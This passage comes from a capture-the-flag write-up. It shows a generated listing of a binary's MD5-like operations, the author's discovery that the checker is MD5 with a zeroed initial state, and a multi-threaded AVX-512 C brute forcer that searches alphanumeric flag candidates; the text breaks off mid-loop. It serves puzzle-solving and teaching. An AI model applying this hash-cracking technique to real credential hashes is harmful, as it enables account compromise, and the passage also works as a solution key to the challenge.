A[6] = rotl(A[4] | A[8], 4)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[82]
A[4] = A[6] + A[43]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 11)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[85]
A[4] = A[6] + A[44]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 16)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[88]
A[4] = A[6] + A[45]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 23)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[75]
A[4] = A[6] + A[46]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 4)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[78]
A[4] = A[6] + A[47]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 11)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[81]
A[4] = A[6] + A[48]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 16)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[84]
A[4] = A[6] + A[49]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 23)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[87]
A[4] = A[6] + A[50]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 4)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[74]
A[4] = A[6] + A[51]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 11)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[77]
A[4] = A[6] + A[52]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 16)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[80]
A[4] = A[6] + A[53]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 23)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[83]
A[4] = A[6] + A[54]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 4)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[86]
A[4] = A[6] + A[55]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 11)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[89]
A[4] = A[6] + A[56]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 16)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[76]
A[4] = A[6] + A[57]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 23)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[74]
A[4] = A[6] + A[58]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 6)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[81]
A[4] = A[6] + A[59]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 10)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[88]
A[4] = A[6] + A[60]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 15)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[79]
A[4] = A[6] + A[61]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 21)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[86]
A[4] = A[6] + A[62]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 6)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[77]
A[4] = A[6] + A[63]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 10)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[84]
A[4] = A[6] + A[64]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 15)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[75]
A[4] = A[6] + A[65]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 21)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[82]
A[4] = A[6] + A[66]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 6)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[89]
A[4] = A[6] + A[67]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 10)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[80]
A[4] = A[6] + A[68]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 15)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[87]
A[4] = A[6] + A[69]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 21)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[78]
A[4] = A[6] + A[70]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 6)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[85]
A[4] = A[6] + A[71]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 10)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[76]
A[4] = A[6] + A[72]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 15)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[83]
A[4] = A[6] + A[73]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 21)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[125] + A[0]
A[0] = A[5] | A[8]
A[5] = A[126] + A[1]
A[1] = A[5] | A[8]
A[5] = A[127] + A[2]
A[2] = A[5] | A[8]
A[5] = A[128] + A[3]
A[3] = A[5] | A[8]
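A listing like this is easy to execute directly, which is handy for checking it against the real binary. The following is a minimal sketch, assuming that rotl() means a 32-bit left rotation and that every result wraps around at 32 bits; run_commands is a made-up helper name, and eval is only reasonable here because the input is a file we generated ourselves.

```python
MASK = 0xffffffff

def rotl(x, n):
    """Rotate a 32-bit value left by n bits."""
    return ((x << n) | (x >> (32 - n))) & MASK

def run_commands(lines, A):
    """Execute lines such as 'A[5] = A[4] + A[0]' on the list of 32-bit words A."""
    env = {'A': A, 'rotl': rotl}
    for line in lines:
        target, expr = line.split(' = ', 1)
        index = int(target[2:-1])          # 'A[5]' -> 5
        A[index] = eval(expr, env) & MASK  # wrap additions at 32 bits
    return A

# Tiny demo on a zero-filled array, mirroring the calloc'd buffer
A = run_commands([
    'A[9] = 0xffffffff',
    'A[0] = A[9] + A[9]',
    'A[1] = rotl(A[0] | A[8], 1)',
], [0] * 129)
print(hex(A[0]), hex(A[1]))  # 0xfffffffe 0xfffffffd
```

To run the full program, one would first fill in the input words (A[74] onwards, since the flag bits start at offset 0x940 = 74 * 32) and then feed in the lines of commands2.txt.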

Failing with z3

The last thing to do now was to pass everything into z3, and boom, get the flag… right? Well, it turned out not to be that simple. I had z3 running for half an hour but still got no output, so what was going on?

I went back to the Ghidra decompilation for any clues to make it go faster. Apparently, I had missed something: a reference to __ctype_b_loc() in the code. __ctype_b_loc() is a glibc function that is used in the implementations of certain C functions like isalpha() and isdigit(). More specifically, it gives access to a table of const unsigned short int values (call it ctype_b_values[]), indexed by character, where each entry is a 16-bit bitmask in which each bit encodes the return value of one of the is*****() functions.

Where is this used, you may ask? After the long stream of if statements, the program iterates through each byte of the flag (inside corctf{...}), and terminates the loop early if (ctype_b_values[flag[i]] & 8) == 0. That mask (bit 3) corresponds to isalnum(), and a set bit means that the byte is alphanumeric. Therefore, the flag has to be alphanumeric.

I applied this new constraint to z3 hoping it would output a solution this time, but was gutted to find that it still would not budge.

However, this presents some new useful information; the size of the brute force search is not 69,833,729,609,375, but 50*62^6 = 2,840,011,779,200 (62 alphanumeric choices for each of the 6 free bytes, and only 50 choices for flag[16], since flag[16] + 1 and flag[16] + 4 must be alphanumeric too). That’s nearly a 25x improvement, but still no easy task. Even if each of the 865 instructions I would have to execute accounted for one clock cycle, it would still take 2,840,011,779,200 * 865 / (2*10^9) / 60 / 60 ~ 341 hours on a typical 2 GHz computer.
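The numbers above can be reproduced in a few lines. This is a sketch under the constraints listed earlier: flag[16] is treated as the one constrained byte (because flag[7] == flag[16] + 1 and flag[14] == flag[16] + 4 must be alphanumeric as well), and the other six free bytes are unconstrained alphanumerics. The variable names are made up for illustration.

```python
import string

ALNUM = set(string.ascii_letters + string.digits)  # 62 characters
PRINTABLE = 95                                      # printable ASCII, 0x20..0x7e

# Values of flag[16] for which flag[16] + 1 and flag[16] + 4 are alphanumeric too
pivot_choices = [c for c in ALNUM
                 if chr(ord(c) + 1) in ALNUM and chr(ord(c) + 4) in ALNUM]

before = PRINTABLE ** 7
after = len(pivot_choices) * len(ALNUM) ** 6
hours = after * 865 / 2e9 / 3600  # one cycle per instruction at 2 GHz

print(len(pivot_choices))       # 50
print(after)                    # 2840011779200
print(round(before / after, 1)) # 24.6
print(round(hours))             # 341
```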

At this point we had 14 hours left in the CTF, and it was also 3AM, so I wanted to go to sleep. As one final effort for the night, I Googled one of the mysterious hexadecimal constants in the code to see if anything would pop up.

I wasn’t expecting any results, until I started seeing MD5 pop up! Could it be that this entire program was implementing MD5? Indeed, after testing the program with different inputs, it turned out to be MD5, but not entirely. Normally, the MD5 state is initialized to 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476, but in the program these are all set to zero. Let’s just call this variant MD5-0.
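For reference, here is a compact pure-Python MD5 with a configurable initial state. It is a sketch that follows RFC 1321 and assumes that the initial state is the only thing the binary changes; the md5() function and its iv parameter are my own naming, not something taken from the challenge.

```python
import math
import struct

# Per-step left-rotation amounts and the 64 sine-derived constants from RFC 1321
S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
K = [int(abs(math.sin(i + 1)) * 2**32) & 0xffffffff for i in range(64)]
STANDARD_IV = (0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476)

def rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xffffffff

def md5(message, iv=STANDARD_IV):
    # Padding: 0x80, zeros up to 56 mod 64, then the bit length (64-bit little-endian)
    padded = message + b'\x80' + b'\x00' * ((55 - len(message)) % 64)
    padded += struct.pack('<Q', (8 * len(message)) & 0xffffffffffffffff)
    state = list(iv)
    for off in range(0, len(padded), 64):
        m = struct.unpack('<16I', padded[off:off + 64])
        a, b, c, d = state
        for i in range(64):
            if i < 16:
                f, g = (b & c) | (~b & d), i
            elif i < 32:
                f, g = (d & b) | (~d & c), (5 * i + 1) % 16
            elif i < 48:
                f, g = b ^ c ^ d, (3 * i + 5) % 16
            else:
                f, g = c ^ (b | ~d), (7 * i) % 16
            f = (f + a + K[i] + m[g]) & 0xffffffff
            a, d, c, b = d, c, b, (b + rotl(f, S[i])) & 0xffffffff
        state = [(s + v) & 0xffffffff for s, v in zip(state, (a, b, c, d))]
    return struct.pack('<4I', *state)

print(md5(b'abc').hex())                   # 900150983cd24fb0d6963f7d28e17f72
print(md5(b'abc', iv=(0, 0, 0, 0)).hex())  # the "MD5-0" digest of the same input
```

The first line is the well-known MD5 of "abc", which confirms the implementation; passing iv=(0, 0, 0, 0) gives the zero-initialized variant. The first few entries of K are also the constants that show up in the decompiled listing (0xd76aa478, 0xe8c7b756, ...).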

In any case, I went to sleep with this knowledge hoping to crack this the next day.

The next day

(I woke up ~~bright and early~~ at 11AM the next morning)

Since no practical preimage attack on MD5 is known, the only option was to brute force MD5-0 over 2,840,011,779,200 possibilities, where the correct flag should produce a digest ending in 19c603ba14353ce4.

To test the feasibility of the brute force, I grabbed an online C implementation of MD5 and measured its speed. The baseline single-threaded performance on my machine reached around 8*10^6 hashes per second. While this seemed relatively fast to me, the actual running time on 4 cores would be a daunting 2,840,011,779,200 / (8*10^6) / 60 / 60 / 4 ~ 25 hours.

Optimizing the program by making use of the fact that the flag was always 11 bytes long and unrolling all of the loops, I was still only able to reach 1.3*10^7 hashes per second, or 15 hours. Still not nearly fast enough!

Vectorization is OP

A common “cheat” to magically increase a program’s speed is by using x86 SIMD instructions to perform vectorized operations on more than 64 bits at a time. Luckily, my computer supported AVX-512, an instruction set that allows performing 16 32-bit operations in parallel.

I wrote a new MD5 implementation from scratch utilizing these instructions, called md5_avx512, which could hash 16 11-byte strings at once. I was expecting maybe a 4-8x speedup, but it ended up being able to compute hashes 16x faster, which is the theoretical optimum! This brought the estimated time to just under an hour, which might just be fast enough.
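The running time estimates so far all come from the same formula, sketched below. It assumes perfect scaling across 4 cores and that the 16x vectorization speedup applies on top of the unrolled 1.3*10^7 hashes per second; the helper name hours is made up.

```python
SEARCH_SPACE = 50 * 62**6  # 2,840,011,779,200 candidate flags
CORES = 4

def hours(hashes_per_second_per_core, cores=CORES):
    """Hours needed to cover the whole search space, assuming perfect scaling."""
    return SEARCH_SPACE / (hashes_per_second_per_core * cores) / 3600

baseline = hours(8e6)           # off-the-shelf C implementation
unrolled = hours(1.3e7)         # fixed 11-byte input, loops unrolled
vectorized = hours(1.3e7 * 16)  # 16 lanes per AVX-512 register

print(round(baseline, 1), round(unrolled, 1), round(vectorized, 2))  # 24.7 15.2 0.95
```

Note that these are worst-case figures for exhausting the entire space; on average the flag would turn up after about half of that.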

By the time I finished writing the program, we only had one hour left on the clock. Regardless, I ran the program and waited for a miracle. Unfortunately, it took longer than expected: it was only halfway done with 10 minutes left on the clock. I held out for a clutch victory, but it did not come.

Two stupid bugs

After the CTF concluded I kept my program running, but it actually finished without finding any solution! To my (annoyed) disbelief, I had introduced two stupid bugs. One was using the flipped endianness for the target suffix, and the other was applying #pragma omp parallel for without realizing that the threads were overwriting each other’s variables!
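The endianness bug is easy to reproduce. MD5 serializes its state words in little-endian order, so the 8-byte target suffix has to be read as two little-endian 32-bit words before it can be compared against the `c` and `d` registers. A quick sketch (the variable names are mine):

```python
import struct

TARGET_SUFFIX = bytes.fromhex("19c603ba14353ce4")

# Correct: MD5 state words are stored little-endian in the digest.
c_word, d_word = struct.unpack("<2I", TARGET_SUFFIX)

# The buggy interpretation: reading the same bytes as big-endian words.
wrong_c, wrong_d = struct.unpack(">2I", TARGET_SUFFIX)

print(hex(c_word), hex(d_word))    # these match T0 and T1 in the listing below
print(hex(wrong_c), hex(wrong_d))  # these would never match a real digest word
```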

After fixing these bugs, I was at last able to run the multi-threaded, AVX-512 optimized MD5-0 brute forcer without any issues:

// gcc -O3 -march=native -pthread -o brute brute.c && ./brute

#include <stdio.h>
#include <stdint.h>
#include <immintrin.h>
#include <pthread.h>

#define AVX512_F 0xca
#define AVX512_G 0xe4
#define AVX512_H 0x96
#define AVX512_I 0x39

#define AVX512_STEP(f, a, b, c, d, r, k) { \
    (a) = _mm512_add_epi32((a), _mm512_add_epi32(_mm512_ternarylogic_epi32((b), (c), (d), (f)), (k))); \
    (a) = _mm512_add_epi32(_mm512_rol_epi32((a), (r)), (b)); \
}

#define T0 0xba03c619
#define T1 0xe43c3514

static void md5_avx512(__m512i x0, __m512i x1, __m512i x2) {
    __m512i a = _mm512_setzero_si512();
    __m512i b = _mm512_setzero_si512();
    __m512i c = _mm512_setzero_si512();
    __m512i d = _mm512_setzero_si512();

    // Round 1
    AVX512_STEP(AVX512_F, a, b, c, d, 7, _mm512_add_epi32(x0, _mm512_set1_epi32(0xd76aa478)));
    AVX512_STEP(AVX512_F, d, a, b, c, 12, _mm512_add_epi32(x1, _mm512_set1_epi32(0xe8c7b756)));
    AVX512_STEP(AVX512_F, c, d, a, b, 17, _mm512_add_epi32(x2, _mm512_set1_epi32(0x242070db)));
    AVX512_STEP(AVX512_F, b, c, d, a, 22, _mm512_set1_epi32(0xc1bdceee));

    AVX512_STEP(AVX512_F, a, b, c, d, 7, _mm512_set1_epi32(0xf57c0faf));
    AVX512_STEP(AVX512_F, d, a, b, c, 12, _mm512_set1_epi32(0x4787c62a));
    AVX512_STEP(AVX512_F, c, d, a, b, 17, _mm512_set1_epi32(0xa8304613));
    AVX512_STEP(AVX512_F, b, c, d, a, 22, _mm512_set1_epi32(0xfd469501));

    AVX512_STEP(AVX512_F, a, b, c, d, 7, _mm512_set1_epi32(0x698098d8));
    AVX512_STEP(AVX512_F, d, a, b, c, 12, _mm512_set1_epi32(0x8b44f7af));
    AVX512_STEP(AVX512_F, c, d, a, b, 17, _mm512_set1_epi32(0xffff5bb1));
    AVX512_STEP(AVX512_F, b, c, d, a, 22, _mm512_set1_epi32(0x895cd7be));

    AVX512_STEP(AVX512_F, a, b, c, d, 7, _mm512_set1_epi32(0x6b901122));
    AVX512_STEP(AVX512_F, d, a, b, c, 12, _mm512_set1_epi32(0xfd987193));
    AVX512_STEP(AVX512_F, c, d, a, b, 17, _mm512_set1_epi32(0xa67943e6));
    AVX512_STEP(AVX512_F, b, c, d, a, 22, _mm512_set1_epi32(0x49b40821));

    // Round 2
    AVX512_STEP(AVX512_G, a, b, c, d, 5, _mm512_add_epi32(x1, _mm512_set1_epi32(0xf61e2562)));
    AVX512_STEP(AVX512_G, d, a, b, c, 9, _mm512_set1_epi32(0xc040b340));
    AVX512_STEP(AVX512_G, c, d, a, b, 14, _mm512_set1_epi32(0x265e5a51));
    AVX512_STEP(AVX512_G, b, c, d, a, 20, _mm512_add_epi32(x0, _mm512_set1_epi32(0xe9b6c7aa)));

    AVX512_STEP(AVX512_G, a, b, c, d, 5, _mm512_set1_epi32(0xd62f105d));
    AVX512_STEP(AVX512_G, d, a, b, c, 9, _mm512_set1_epi32(0x02441453));
    AVX512_STEP(AVX512_G, c, d, a, b, 14, _mm512_set1_epi32(0xd8a1e681));
    AVX512_STEP(AVX512_G, b, c, d, a, 20, _mm512_set1_epi32(0xe7d3fbc8));

    AVX512_STEP(AVX512_G, a, b, c, d, 5, _mm512_set1_epi32(0x21e1cde6));
    AVX512_STEP(AVX512_G, d, a, b, c, 9, _mm512_set1_epi32(0xc337082e));
    AVX512_STEP(AVX512_G, c, d, a, b, 14, _mm512_set1_epi32(0xf4d50d87));
    AVX512_STEP(AVX512_G, b, c, d, a, 20, _mm512_set1_epi32(0x455a14ed));

    AVX512_STEP(AVX512_G, a, b, c, d, 5, _mm512_set1_epi32(0xa9e3e905));
    AVX512_STEP(AVX512_G, d, a, b, c, 9, _mm512_add_epi32(x2, _mm512_set1_epi32(0xfcefa3f8)));
    AVX512_STEP(AVX512_G, c, d, a, b, 14, _mm512_set1_epi32(0x676f02d9));
    AVX512_STEP(AVX512_G, b, c, d, a, 20, _mm512_set1_epi32(0x8d2a4c8a));

    // Round 3
    AVX512_STEP(AVX512_H, a, b, c, d, 4, _mm512_set1_epi32(0xfffa3942));
    AVX512_STEP(AVX512_H, d, a, b, c, 11, _mm512_set1_epi32(0x8771f681));
    AVX512_STEP(AVX512_H, c, d, a, b, 16, _mm512_set1_epi32(0x6d9d6122));
    AVX512_STEP(AVX512_H, b, c, d, a, 23, _mm512_set1_epi32(0xfde53864));

    AVX512_STEP(AVX512_H, a, b, c, d, 4, _mm512_add_epi32(x1, _mm512_set1_epi32(0xa4beea44)));
    AVX512_STEP(AVX512_H, d, a, b, c, 11, _mm512_set1_epi32(0x4bdecfa9));
    AVX512_STEP(AVX512_H, c, d, a, b, 16, _mm512_set1_epi32(0xf6bb4b60));
    AVX512_STEP(AVX512_H, b, c, d, a, 23, _mm512_set1_epi32(0xbebfbc70));

    AVX512_STEP(AVX512_H, a, b, c, d, 4, _mm512_set1_epi32(0x289b7ec6));
    AVX512_STEP(AVX512_H, d, a, b, c, 11, _mm512_add_epi32(x0, _mm512_set1_epi32(0xeaa127fa)));
    AVX512_STEP(AVX512_H, c, d, a, b, 16, _mm512_set1_epi32(0xd4ef3085));
    AVX512_STEP(AVX512_H, b, c, d, a, 23, _mm512_set1_epi32(0x04881d05));

    AVX512_STEP(AVX512_H, a, b, c, d, 4, _mm512_set1_epi32(0xd9d4d039));
    AVX512_STEP(AVX512_H, d, a, b, c, 11, _mm512_set1_epi32(0xe6db99e5));
    AVX512_STEP(AVX512_H, c, d, a, b, 16, _mm512_set1_epi32(0x1fa27cf8));
    AVX512_STEP(AVX512_H, b, c, d, a, 23, _mm512_add_epi32(x2, _mm512_set1_epi32(0xc4ac5665)));

    // Round 4
    AVX512_STEP(AVX512_I, a, b, c, d, 6, _mm512_add_epi32(x0, _mm512_set1_epi32(0xf4292244)));
    AVX512_STEP(AVX512_I, d, a, b, c, 10, _mm512_set1_epi32(0x432aff97));
    AVX512_STEP(AVX512_I, c, d, a, b, 15, _mm512_set1_epi32(0xab9423ff));
    AVX512_STEP(AVX512_I, b, c, d, a, 21, _mm512_set1_epi32(0xfc93a039));

    AVX512_STEP(AVX512_I, a, b, c, d, 6, _mm512_set1_epi32(0x655b59c3));
    AVX512_STEP(AVX512_I, d, a, b, c, 10, _mm512_set1_epi32(0x8f0ccc92));
    AVX512_STEP(AVX512_I, c, d, a, b, 15, _mm512_set1_epi32(0xffeff47d));
    AVX512_STEP(AVX512_I, b, c, d, a, 21, _mm512_add_epi32(x1, _mm512_set1_epi32(0x85845dd1)));

    AVX512_STEP(AVX512_I, a, b, c, d, 6, _mm512_set1_epi32(0x6fa87e4f));
    AVX512_STEP(AVX512_I, d, a, b, c, 10, _mm512_set1_epi32(0xfe2ce6e0));
    AVX512_STEP(AVX512_I, c, d, a, b, 15, _mm512_set1_epi32(0xa3014314));
    AVX512_STEP(AVX512_I, b, c, d, a, 21, _mm512_set1_epi32(0x4e0811a1));

    AVX512_STEP(AVX512_I, a, b, c, d, 6, _mm512_set1_epi32(0xf7537e82));
    AVX512_STEP(AVX512_I, d, a, b, c, 10, _mm512_set1_epi32(0xbd3af235));
    AVX512_STEP(AVX512_I, c, d, a, b, 15, _mm512_add_epi32(x2, _mm512_set1_epi32(0x2ad7d2bb)));
    AVX512_STEP(AVX512_I, b, c, d, a, 21, _mm512_set1_epi32(0xeb86d391));

    __mmask16 eq_c = _mm512_cmpeq_epi32_mask(c, _mm512_set1_epi32(T0));
    __mmask16 eq_d = _mm512_cmpeq_epi32_mask(d, _mm512_set1_epi32(T1));
    __mmask16 eq = eq_c & eq_d;

    if (eq) {
        __attribute__((aligned(64))) uint32_t _x0[16], _x1[16], _x2[16];
        _mm512_store_si512(_x0, x0);
        _mm512_store_si512(_x1, x1);
        _mm512_store_si512(_x2, x2);

        for (int i = 0; i < 16; i++)
            if ((eq >> i) & 1)
                printf("found: %.4s%.4s%.4s\n", (uint8_t *)&_x0[i], (uint8_t *)&_x1[i], (uint8_t *)&_x2[i]);
    }
}

#define A 62
#define NTHREADS 8

const char ALPHABET[64] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz00";
const char ALPHABET_S4[50] = "012345ABCDEFGHIJKLMNOPQRSTUVabcdefghijklmnopqrstuv";

static void *search(void *arg) {
    __attribute__((aligned(64))) uint32_t _x0[16], _x1[16], _x2[16];

    int n = (uint64_t)arg;

    int start = n * (50 / NTHREADS);
    int end = n != NTHREADS - 1 ? (n + 1) * (50 / NTHREADS) : 50;

    printf("starting search [%d, %d)\n", start, end);

    uint8_t flag[12] = { 0 };
    flag[11] = 0x80;

    const __m512i Y0 = _mm512_setr_epi32(48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 65, 66, 67, 68, 69, 70);
    const __m512i Y1 = _mm512_setr_epi32(71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86);
    const __m512i Y2 = _mm512_setr_epi32(87, 88, 89, 90, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108);
    const __m512i Y3 = _mm512_setr_epi32(109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 48, 48);

    for (int c0 = start; c0 < end; c0++) {
        flag[9] = ALPHABET_S4[c0];
